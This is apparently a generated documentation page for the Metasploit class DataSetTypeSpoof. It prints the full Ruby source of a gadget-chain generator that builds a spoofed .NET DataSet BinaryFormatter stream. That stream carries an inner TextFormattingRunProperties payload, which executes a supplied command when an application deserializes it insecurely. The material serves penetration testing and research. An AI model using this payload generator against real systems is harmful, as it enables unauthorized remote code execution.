Class: Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof
- Inherits:
-
Types::SerializedStream
- Object
- BinData::Record
- Types::SerializedStream
- Msf::Util::DotNetDeserialization::GadgetChains::DataSetTypeSpoof
- Defined in:
- lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb
Class Method Summary collapse
-
.generate(cmd) ⇒ Object
DataSetTypeSpoof Credits: Finders: James Forshaw Contributors: Soroush Dalili, Markus Wulftange, Jang References: github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs.
Methods inherited from Types::SerializedStream
from_values, #get_object, #set_object
Class Method Details
.generate(cmd) ⇒ Object
DataSetTypeSpoof
Credits:
Finders: James Forshaw
Contributors: Soroush Dalili, Markus Wulftange, Jang
References:
https://github.com/pwntester/ysoserial.net/blob/b486d8bbaed82e1959750ee36f4ab88d91bccc67/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 |
# File 'lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb', line 15 def self.generate(cmd) inner = GadgetChains::TextFormattingRunProperties.generate(cmd) system_data = Assemblies::VERSIONS['4.0.0.0'].fetch('System.Data') library = Types::RecordValues::BinaryLibrary.new( library_id: 3, library_name: system_data.to_s ) self.from_values([ Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), Types::RecordValues::BinaryLibrary.new(library_id: 2, library_name: 'mscorlib'), library, Types::RecordValues::ClassWithMembersAndTypes.new( class_info: Types::General::ClassInfo.new( obj_id: 1, name: 'System.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', member_names: %w[ DataSet.RemotingFormat DataSet.DataSetName DataSet.Namespace DataSet.Prefix DataSet.CaseSensitive DataSet.LocaleLCID DataSet.EnforceConstraints DataSet.ExtendedProperties DataSet.Tables.Count DataSet.Tables_0 ] ), member_type_info: Types::General::MemberTypeInfo.new( binary_type_enums: %i{ Class String String String Primitive Primitive Primitive Object Primitive PrimitiveArray }, additional_infos: [ {type_name: 'System.Data.SerializationFormat', library_id: library.library_id}, 1, 8, 1, 8, 2 ] ), library_id: 2, member_values: [ Types::Record.from_value(Types::RecordValues::ClassWithMembersAndTypes.new( class_info: Types::General::ClassInfo.new( obj_id: -4, name: 'System.Data.SerializationFormat', member_names: %w[ value__ ] ), member_type_info: Types::General::MemberTypeInfo.new( binary_type_enums: %i{ Primitive }, additional_infos: [ 8 ] ), library_id: library.library_id, member_values: [ 1 ] )), Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(obj_id: 5)), Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)), Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 5)), false, 1033, false, Types::Record.from_value(Types::RecordValues::ObjectNull.new), 1, Types::Record.from_value(Types::RecordValues::MemberReference.new(id_ref: 6)) ] ), Types::RecordValues::ArraySinglePrimitive.new( array_info: { obj_id: 6, member_count: inner.num_bytes }, primitive_type_enum: Enums::PrimitiveTypeEnum[:Byte], members: inner.to_binary_s.bytes ), Types::RecordValues::MessageEnd.new ]) end |